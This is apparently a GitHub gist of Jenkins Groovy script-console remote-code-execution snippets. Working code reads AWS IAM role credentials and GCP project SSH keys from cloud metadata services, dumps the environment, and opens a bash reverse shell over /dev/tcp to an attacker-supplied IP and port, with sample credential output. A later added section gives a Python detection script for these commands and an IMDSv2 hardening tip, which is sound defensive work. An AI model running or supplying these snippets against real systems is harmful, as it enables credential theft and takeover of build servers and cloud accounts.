@random-robbie
Last active May 28, 2020 10:47

Jenkins Groovy RCE Commands

AWS IAM ROLE KEYS

def command = "wget -q -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/"
def proc = command.execute()
proc.waitFor()

def command2 = "wget -q -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/${proc.in.text}/"
def proc2 = command2.execute()
proc2.waitFor()

println "Process exit code: ${proc2.exitValue()}"
println "Std Err: ${proc2.err.text}"
println "Std Out: ${proc2.in.text}"

This should print the IAM role keys:

Process exit code: 0
Std Err: 
Std Out: {
  "Code" : "Success",
  "LastUpdated" : "2018-10-08T15:36:01Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIAXASDASDADSSAD7",
  "SecretAccessKey" : "iSnUqdsffsdfssfdfdsdfdsfNXutY",
  "Token" : "9QNiu+O/+kh6PvtfkDeh47h5eqvIGyiQ6HE+HqmgHtXRgXfdqduR5MdYOo9AzUsdffffffffffLQn6qzPj2sm7anG1v/S4EgP/sdrDOyHk9xeXV58o9PLt3QU=",
  "Expiration" : "2018-10-08T21:53:19Z"
}

Reverse Shell

Replace YOURIP with your IP and YOURPORT with your port.

Ensure you have nc running for the connect-back.

def command = "bash -i >& /dev/tcp/YOURIP/YOURPORT 0>&1"
def proc = command.execute()
proc.waitFor()

println "Process exit code: ${proc.exitValue()}"
println "Std Err: ${proc.err.text}"
println "Std Out: ${proc.in.text}"

Google Metadata Public SSH Keys

def command = "curl http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json"
def proc = command.execute()
proc.waitFor()

println "Process exit code: ${proc.exitValue()}"
println "Std Err: ${proc.err.text}"
println "Std Out: ${proc.in.text}"

Print Environment - handy to see if it's a container!

def command = "printenv"
def proc = command.execute()
proc.waitFor()

println "Process exit code: ${proc.exitValue()}"
println "Std Err: ${proc.err.text}"
println "Std Out: ${proc.in.text}"
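
For defenders: every snippet above runs its command as a child process of the Jenkins JVM, so process-creation telemetry is a practical place to catch script-console abuse. The following is an added example, not part of the original gist, that applies rules built from the gist's own command strings; the event format, the jenkins.war parent pattern and the sample events are assumptions constructed for illustration.

```python
import re

# Indicators taken from the command strings used in the snippets above.
RULES = [
    ("aws-iam-credential-read",
     re.compile(r"169\.254\.169\.254/latest/meta-data/iam/security-credentials/")),
    ("gcp-metadata-read",
     re.compile(r"metadata\.google\.internal/computeMetadata/")),
    ("dev-tcp-redirect", re.compile(r"/dev/tcp/")),
    ("environment-dump", re.compile(r"^\s*printenv\b")),
]

# Assumption: the Jenkins controller is a java process started from jenkins.war.
JENKINS_PARENT = re.compile(r"\bjava\b.*\bjenkins\.war\b")


def triage(events):
    """Return (rule, cmdline) for each Jenkins-spawned process that matches a rule."""
    hits = []
    for ev in events:
        if not JENKINS_PARENT.search(ev.get("parent", "")):
            continue  # not a child of the Jenkins JVM
        cmdline = ev.get("cmdline", "")
        for name, pattern in RULES:
            if pattern.search(cmdline):
                hits.append((name, cmdline))
    return hits


# Constructed sample events (hypothetical format: parent and child command lines).
JENKINS = "/usr/bin/java -jar /usr/share/jenkins/jenkins.war"
SAMPLE_EVENTS = [
    {"parent": JENKINS, "cmdline": "wget -q -O - http://169.254.169.254"
                                   "/latest/meta-data/iam/security-credentials/"},
    {"parent": JENKINS, "cmdline": "git fetch --tags origin"},  # normal build step
    {"parent": JENKINS, "cmdline": "curl http://metadata.google.internal"
                                   "/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json"},
    {"parent": JENKINS, "cmdline": "bash -i >& /dev/tcp/YOURIP/YOURPORT 0>&1"},
    {"parent": JENKINS, "cmdline": "printenv"},
    {"parent": "/bin/bash", "cmdline": "printenv"},  # admin shell, not Jenkins
]

if __name__ == "__main__":
    for rule, cmd in triage(SAMPLE_EVENTS):
        print(f"[{rule}] {cmd}")
```

On EC2, setting the instance metadata option HttpTokens to required (IMDSv2) makes the token-less GET in the first snippet fail, which complements this kind of detection.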